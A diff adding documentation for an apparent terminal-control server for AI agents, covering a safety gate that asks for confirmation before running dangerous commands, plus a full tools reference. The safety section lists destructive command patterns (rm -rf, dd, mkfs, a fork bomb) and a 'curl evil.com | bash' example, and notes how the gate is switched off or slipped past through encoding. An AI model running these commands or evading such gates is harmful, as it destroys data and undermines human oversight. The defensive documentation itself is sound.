+When you send a command via `session_send`, `session_interact`, or `session_exec`, the safety gate checks the command text against a set of regex patterns. If a match is found:
+
+1. The command is **not executed**
+2. The response includes `requires_confirmation: true`, the blocked command, and the reason
+3. To proceed, resend with `confirmed: true`
+
+This gives the AI agent (and the human overseeing it) a chance to reconsider before executing something destructive.
+
+## Built-in Patterns
+
+The safety gate detects 17 categories of dangerous commands:
+
+| Category | Pattern | Example |
+|----------|---------|---------|
+| Recursive delete | `rm -rf`, `rm -f` | `rm -rf /important` |
+| Disk write | `dd` | `dd if=/dev/zero of=/dev/sda` |
+| Format filesystem | `mkfs` | `mkfs.ext4 /dev/sda1` |
+| SQL destructive | `DROP TABLE`, `TRUNCATE` | `DROP TABLE users;` |
+| Remote execution | `curl \| sh`, `wget \| sh` | `curl evil.com \| bash` |
+| Dangerous permissions | `chmod 777`, `chmod -R` | `chmod 777 /var/www` |
+| Recursive chown | `chown -R` | `chown -R root:root /` |
+| Raw disk write | `> /dev/sd*` | `echo x > /dev/sda` |
+| Fork bomb | `:(){ :\|:& };:` | Fork bomb pattern |
+| System shutdown | `shutdown` | `shutdown -h now` |
+| System reboot | `reboot` | `reboot` |
+| Init level | `init 0`, `init 6` | `init 0` |
+| Service control | `systemctl stop/disable/mask` | `systemctl stop nginx` |
+| Force kill | `kill -9` | `kill -9 1234` |
+| Force pkill | `pkill -9` | `pkill -9 nginx` |
+
+## Adding Custom Patterns
+
+Add extra patterns via the `TERMINAL_MCP_DANGEROUS_PATTERNS` environment variable. Patterns are semicolon-separated regexes:
+
+```json
+{
+  "env": {
+    "TERMINAL_MCP_DANGEROUS_PATTERNS": "\\bterraform\\s+destroy\\b;\\bkubectl\\s+delete\\s+namespace\\b"
+  }
+}
+```
+
+This adds two custom patterns:
+- `terraform destroy` - prevents accidental infrastructure teardown
+- `kubectl delete namespace` - prevents deleting Kubernetes namespaces
+
+Custom patterns are added to (not replacing) the built-in set.
+
+## Disabling the Safety Gate
+
+For trusted environments or automated pipelines where confirmation isn't practical:
+
+```json
+{
+  "env": {
+    "TERMINAL_MCP_SAFETY_GATE": "off"
+  }
+}
+```
+
+**Use with caution.** When the safety gate is off, all commands execute immediately without confirmation.
+
+## Interaction Flow
+
+```
+AI Agent                          terminal-mcp
+   |                                   |
+   |  session_send(input="rm -rf /")   |
+   |---------------------------------->|
+   |                                   | Safety gate check
+   |  { requires_confirmation: true,   |
+   |    command: "rm -rf /",           |
+   |    reason: "Matched: rm -rf" }    |
+   |<----------------------------------|
+   |                                   |
+   | (Agent decides whether to proceed)|
+   |                                   |
+   |  session_send(input="rm -rf /",   |
+   |    confirmed=true)                |
+   |---------------------------------->|
+   |                                   | Executes command
+   |  { bytes_sent: 10 }              |
+   |<----------------------------------|
+```
+
+## Security Considerations
+
+- The safety gate is a **heuristic** - it catches common destructive patterns but is not a security sandbox
+- Commands can be constructed to bypass regex matching (e.g., using variables, aliases, or encoding)
+- For production environments, consider running terminal-mcp with restricted OS-level permissions
+- The `password` parameter on `session_send` prevents credentials from appearing in logs, but they are still sent to the PTY
+- Sessions run as the same OS user as the terminal-mcp process

--- a/docs/tools.md
+++ b/docs/tools.md
@@ -1,0 +1,298 @@
+# Tools Reference
+
+terminal-mcp exposes **9 MCP tools** for creating and managing interactive terminal sessions.
+
+---
+
+## session_create
+
+Spawn a persistent PTY terminal session.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `command` | string | Yes | - | Shell command to run (e.g. `bash`, `python3`, `ssh user@host`) |
+| `label` | string | No | command name | Human-readable label for the session |
+| `rows` | integer | No | 24 | Terminal height in rows |
+| `cols` | integer | No | 80 | Terminal width in columns |
+| `idle_timeout` | integer | No | 1800 | Seconds of inactivity before auto-close |
+| `enable_snapshot` | boolean | No | true | Deprecated - snapshot is always enabled |
+| `scrollback_lines` | integer | No | 1000 | Lines of scrollback history to retain |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `session_id` | string | Unique 8-character hex ID |
+| `label` | string | Session label |
+| `pid` | integer | Process ID of the spawned process |
+| `created_at` | float | Unix timestamp of creation |
+| `snapshot_available` | boolean | Always `true` |
+
+**Example:**
+
+```
+session_create  command="python3"  label="repl"  rows=40  cols=120
+```
+
+---
+
+## session_send
+
+Send input to an active session. Exactly one of `input`, `control_char`, `key`, or `password` must be provided.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `session_id` | string | Yes | - | Target session ID |
+| `input` | string | No | - | Text to type |
+| `press_enter` | boolean | No | true | Append carriage return after input |
+| `control_char` | string | No | - | Control character to send |
+| `key` | string | No | - | Special key to press |
+| `password` | string | No | - | Secret text (not logged) |
+| `confirmed` | boolean | No | false | Bypass the dangerous command safety gate |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `bytes_sent` | integer | Number of bytes sent |
+
+If the input matches a dangerous pattern and `confirmed` is `false`:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `requires_confirmation` | boolean | Always `true` |
+| `command` | string | The blocked command |
+| `reason` | string | Why it was blocked |
+
+### Supported Special Keys
+
+| Key | Description | Key | Description |
+|-----|-------------|-----|-------------|
+| `up` | Arrow up | `f1` - `f12` | Function keys |
+| `down` | Arrow down | `home` | Home |
+| `left` | Arrow left | `end` | End |
+| `right` | Arrow right | `page-up` | Page Up |
+| `tab` | Tab | `page-down` | Page Down |
+| `shift-tab` | Shift+Tab | `insert` | Insert |
+| `escape` | Escape | `delete` | Delete |
+| `enter` | Enter | `backspace` | Backspace |
+
+### Supported Control Characters
+
+| Char | Signal | Description |
+|------|--------|-------------|
+| `c` | SIGINT | Interrupt (Ctrl-C) |
+| `d` | EOF | End of file / logout (Ctrl-D) |
+| `z` | SIGTSTP | Suspend (Ctrl-Z) |
+| `l` | - | Clear screen (Ctrl-L) |
+| `]` | - | Telnet escape |
+
+---
+
+## session_read
+
+Read output from a session. Supports four read modes.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `session_id` | string | Yes | - | Target session ID |
+| `mode` | string | No | `auto` | Read mode: `auto`, `stream`, `snapshot`, `diff` |
+| `timeout` | number | No | 2.0 | Settle timeout in seconds (stream/auto) |
+| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
+| `scrollback` | integer | No | - | Lines of scrollback history (snapshot mode) |
+| `truncation` | string | No | config default | `tail`, `head_tail`, `tail_only`, `none` |
+
+### Read Modes
+
+| Mode | When to Use | How It Works |
+|------|-------------|--------------|
+| `auto` | Default - works for everything | Auto-detects TUI apps and switches between stream and snapshot |
+| `stream` | Shell commands, builds | Waits for output to settle, returns new bytes since last read |
+| `snapshot` | TUI apps (htop, vim) | Returns the full rendered screen from pyte virtual terminal |
+| `diff` | Monitoring TUI apps | Returns only screen lines that changed since the last read |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `output` | string | The terminal output |
+| `bytes_read` | integer | Number of bytes read |
+| `prompt_detected` | boolean | Whether a shell prompt was detected |
+| `is_alive` | boolean | Whether the process is still running |
+| `truncated` | boolean | Whether the output was truncated |
+| `tui_active` | boolean | Whether a TUI app is detected |
+| `mode_used` | string | Which read mode was actually used |
+| `snapshot_available` | boolean | Whether snapshot mode is available |
+
+Additional fields in `diff` mode:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `changed_lines` | object | Map of line numbers to content |
+| `is_first_read` | boolean | Whether this is the first diff read |
+
+OSC 133 shell integration fields (when supported):
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `osc133` | boolean | Whether shell integration is active |
+| `command_state` | string | `idle`, `running`, or `finished` |
+| `exit_code` | integer | Exit code of the last command |
+| `command_complete` | boolean | Whether the last command completed |
+
+---
+
+## session_interact
+
+Send input and read output in a single call. Combines `session_send` + `session_read` to halve LLM round trips. Supports all input types and optional regex-based waiting.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `session_id` | string | Yes | - | Target session ID |
+| `input` | string | No | - | Text to type |
+| `press_enter` | boolean | No | true | Append carriage return |
+| `control_char` | string | No | - | Control character |
+| `key` | string | No | - | Special key |
+| `password` | string | No | - | Secret text |
+| `wait_for` | string | No | - | Regex pattern to wait for in output |
+| `timeout` | number | No | 5.0 | Seconds to wait |
+| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
+| `confirmed` | boolean | No | false | Bypass dangerous command gate |
+| `read_mode` | string | No | `stream` | `auto`, `stream`, `snapshot`, `diff` |
+| `truncation` | string | No | config default | Truncation mode |
+
+**Returns:** Same fields as `session_read` plus `bytes_sent` and `matched` (when `wait_for` is used).
+
+**Example - send command and wait for prompt:**
+
+```
+session_interact  session_id="a1b2c3d4"  input="ls -la"  wait_for="\$\s*$"  timeout=5
+```
+
+---
+
+## session_wait_for
+
+Wait for a regex pattern to appear in session output. Use this when you've already sent a command with `session_send` and want to wait for specific output.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `session_id` | string | Yes | - | Target session ID |
+| `pattern` | string | Yes | - | Regex pattern to wait for |
+| `timeout` | number | No | 30.0 | Max seconds to wait |
+| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
+| `truncation` | string | No | config default | Truncation mode |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `output` | string | Output captured until the pattern matched (or timeout) |
+| `bytes_read` | integer | Number of bytes read |
+| `matched` | boolean | Whether the pattern was found |
+| `prompt_detected` | boolean | Whether a shell prompt was detected |
+| `is_alive` | boolean | Whether the process is running |
+
+**Example - wait for build completion:**
+
+```
+session_wait_for  session_id="a1b2c3d4"  pattern="Build complete|ERROR"  timeout=120
+```
+
+---
+
+## session_exec
+
+Execute a command in a temporary session and return the output. The session is created, the command runs, output is captured, and the session is automatically cleaned up.
+
+| Parameter | Type | Required | Default | Description |
+|-----------|------|----------|---------|-------------|
+| `exec` | string | Yes | - | Command to execute |
+| `command` | string | No | `bash` | Shell to use |
+| `timeout` | number | No | 5.0 | Seconds to wait for output |
+| `rows` | integer | No | 24 | Terminal height |
+| `cols` | integer | No | 80 | Terminal width |
+| `truncation` | string | No | config default | Truncation mode |
+| `confirmed` | boolean | No | false | Bypass dangerous command gate |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `output` | string | Command output |
+| `bytes_read` | integer | Number of bytes |
+| `session_id` | string | ID of the temporary session |
+| `truncated` | boolean | Whether the output was truncated |
+
+**Example:**
+
+```
+session_exec  exec="git log --oneline -5"  timeout=10
+```
+
+---
+
+## session_close
+
+Terminate a session gracefully. Uses a three-step shutdown sequence:
+
+1. Send EOF (Ctrl-D)
+2. Wait 2s, then send SIGHUP (Unix) or `proc.terminate()` (Windows)
+3. Wait 2s, then send SIGKILL (Unix) or `proc.kill()` (Windows)
+
+Closing an already-closed session returns success with `already_closed: true` (idempotent).
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `session_id` | string | Yes | Session ID to close |
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `exit_status` | integer | Process exit code |
+| `already_closed` | boolean | `true` if session was already terminated |
+
+---
+
+## session_resize
+
+Resize the terminal dimensions of an active session. Sends SIGWINCH to notify the process.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `session_id` | string | Yes | Session ID |
+| `rows` | integer | Yes | New height |
+| `cols` | integer | Yes | New width |
+
+**Returns:** `rows`, `cols` confirming the new dimensions.
+
+---
+
+## session_list
+
+List all active sessions with their status.
+
+No parameters required.
+
+**Returns:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `sessions` | array | List of session objects |
+| `count` | integer | Number of active sessions |
+
+Each session object contains:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `session_id` | string | Session ID |
+| `label` | string | Session label |
+| `command` | string | The command running |
+| `pid` | integer | Process ID |
+| `is_alive` | boolean | Whether process is running |
+| `created_at` | float | Unix timestamp |
+| `last_activity` | float | Last activity timestamp |
+| `idle_seconds` | float | Seconds since last activity |
+| `tui_active` | boolean | Whether a TUI app is detected |
+| `snapshot_available` | boolean | Whether snapshot mode is available |


### PR DESCRIPTION
## Summary

- **README revamp**: Rewritten to be concise, catchy, and SEO-optimized with clear problem/solution framing, quick start in 30 seconds, real-world use case examples, and a features-at-a-glance table
- **7 new documentation files** under `docs/`:
  - `tools.md` - Complete API reference for all 9 MCP tools with parameters, return values, and examples
  - `architecture.md` - System design, component breakdown, threading model, data flow, cross-platform support
  - `configuration.md` - All env vars, per-session overrides, client config examples for every supported client
  - `safety.md` - Dangerous command detection, built-in patterns, custom patterns, security considerations
  - `examples.md` - Real-world recipes: SSH, REPLs (Python/Node/IPython), databases (psql/mysql/redis/mongo), TUIs (htop/vim/fzf), build workflows, multi-session patterns, tips
  - `changelog.md` - Full version history extracted from README
  - `contributing.md` - Dev setup, project structure, code style, commit conventions, PR labels

## Test plan

- [x] All 243 tests pass
- [x] All internal doc links reference correct file paths
- [x] README renders correctly with existing badges and banner

---
_Generated by [Claude Code](https://claude.ai/code/session_0164KK2Cx8Gd5nNrWw8EpN9r)_